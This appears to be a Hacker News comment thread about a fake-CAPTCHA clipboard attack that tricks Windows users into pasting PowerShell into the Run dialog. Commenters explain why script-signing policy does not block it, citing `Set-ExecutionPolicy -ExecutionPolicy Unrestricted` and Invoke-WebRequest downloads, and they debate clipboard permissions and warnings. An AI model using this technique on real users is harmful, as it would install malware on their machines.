AshamedCaptain 12 hours ago

I do not understand how this works. I thought the default PS policy on all versions of Windows was not to run "unsigned" PS scripts by default (precisely for this reason). Or at least I've personally seen that a myriad times.

So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?

Reply View 3 replies
  • antonyt 12 hours ago

    The attack has the user paste content into the Windows run dialog. That could include spawning an admin Powershell and running `Set-ExecutionPolicy -ExecutionPolicy Unrestricted` before running a remote script. Or more likely what nullindividual said - the download and start of the exe is entirely contained in what the user is pasting in.

    Reply View 0 replies
  • nullindividual 12 hours ago

    It's not a script, which would be a .ps1 file, but from the sounds of it the actual script block/PowerShell function which isn't governed by the signing policy. It could simply be an Invoke-WebRequest to download that executable indicated in the article.

    Reply View 0 replies
  • [removed] 12 hours ago
    [deleted]
    Reply View 0 replies
mimi89999 10 hours ago

Shouldn’t Windows just show a huge warning explaining the implications of such actions when a user who has never used the Windows Run function nor PowerShell suddenly attempts to run some suspicious code pasted form the clipboard?

Reply View 2 replies
  • nullindividual 9 hours ago

    What would you define as 'suspicious'? How would you distinguish suspicious from not suspicious?

    Reply View 1 reply
    • eviks 4 hours ago

      Frequency, network use, running unknown executables

      Reply View 0 replies
mrguyorama 12 hours ago

Why can a website silently add stuff to my clipboard anyway? Firefox and Safari require "transient activation" to enable clipboard actions, which apparently only means you clicked your mouse (anywhere) or made a keystroke. What a brilliant security/permission strategy for such an important function, which can do things like expose your password, modify copied links, shuttle information across web page security and isolation boundaries etc

Chrome at least requires a prompt for reading clipboard contents, which is apparently "diverting from the specifications"!

Who came up with this? Why is every feature in web browsers and javascript built in the dumbest way possible? At least in Win32 when it says "you should only touch the clipboard on request from the user" they have the excuse that it was 1995 and there was very little information to muck with or steal on the average computer! Even then they still worked towards hardening the functionality.

Web browsers implemented this in 2018!

Reply View 3 replies
  • duskwuff 11 hours ago

    > Why can a website silently add stuff to my clipboard anyway?

    It's copying content to the clipboard after the user clicks the "I'm not a robot" button. This is indistinguishable from the user clicking a "copy to clipboard" button on a web page, or clicking through an "edit > copy" menu - the only difference is user intent.

    Reply View 0 replies
  • LorenPechtel 11 hours ago

    There was a click in the sequence. More of an issue I think is that it sounds like this executes immediately. If so I think the proper fix is to preclude Powershell from accepting any form of execution from the clipboard--you can paste in the command but the user must execute it.

    Reply View 1 reply
    • nullindividual 9 hours ago

      The user is executing the script. They're pasting it in and hitting 'run' in the run dialog box.

      Reply View 0 replies
[removed] 13 hours ago
[deleted]
Reply View 0 replies